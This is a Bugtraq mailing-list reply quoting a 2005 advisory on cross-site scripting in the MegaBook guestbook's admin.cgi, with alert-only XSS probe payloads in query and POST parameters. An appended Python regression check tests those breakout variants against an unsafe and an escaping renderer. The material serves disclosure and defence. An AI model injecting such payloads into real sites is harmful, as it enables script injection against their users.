In-Reply-To: <20050505104551.23441.qmail@xxxxxxxxxxxxxxxxxxxxx>

The same vulnerability also exists in the new version of MegaBook V2.1

>Date: 5 May 2005 10:45:51 -0000
>Message-ID: <20050505104551.23441.qmail@xxxxxxxxxxxxxxxxxxxxx>
>From: Spy Hat <spyhat@xxxxxxxxxx>
>To: bugtraq@xxxxxxxxxxxxxxxxx
>Subject: MegaBook V2.0 - Cross Site Scripting Exploit
>
>The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook.
>The affected script is admin.cgi
>
>URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)
>
>I have tested the script with the following query:
>
>?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>
>
>I have also tested the script with these POST variables:
>
>action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>
>
>action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>
>
>action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>
>
>action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>
>
>action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script>
>
>Yours,
>SpyHat
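
Added example, not part of the original posts and not MegaBook's code: a regression check that feeds the five breakout variants from the report through a renderer that reflects input verbatim and through one that validates `entryid` and HTML-encodes reflected values. The form markup and all function names are hypothetical, since the report does not show what admin.cgi emits.

```python
import html
import re

# Breakout prefixes copied from the probes in the report; the script body is
# a constructed stand-in for the scanner's marker string.
PREFIXES = ["", "'>", '">', ">", "</textarea>"]
PROBES = [p + "<script>alert(1)</script>" for p in PREFIXES]

# Hypothetical markup: the report does not show what admin.cgi emits, so this
# form reflects the value in the three contexts the probes try to escape.
FORM = (
    '<input type="hidden" name="entryid" value="{entryid}">\n'
    "<input type='text' name='a' value='{value}'>\n"
    '<input type="text" name="b" value="{value}">\n'
    '<textarea name="c">{value}</textarea>\n'
)


def render_unsafe(entryid, value):
    """Reflect request parameters verbatim, as the report describes."""
    return FORM.format(entryid=entryid, value=value)


def render_safe(entryid, value):
    """Allow only a numeric entryid and HTML-encode the reflected value."""
    if not re.fullmatch(r"[0-9]{1,10}", entryid):
        raise ValueError("entryid must be numeric")
    # quote=True also encodes " and ', which closes the attribute breakouts.
    return FORM.format(entryid=entryid, value=html.escape(value, quote=True))


def has_live_script(page):
    """True when a literal <script> tag reached the generated HTML."""
    return "<script" in page.lower()


def check_all():
    """Return (unsafe_hit, safe_hit) for every probe."""
    return [(has_live_script(render_unsafe("66", p)),
             has_live_script(render_safe("66", p))) for p in PROBES]


if __name__ == "__main__":
    for probe, result in zip(PROBES, check_all()):
        print(f"{probe!r:45} unsafe={result[0]} safe={result[1]}")
```

A password submitted to the form is better not echoed back into the page at all; the encoding step covers values that do have to be redisplayed.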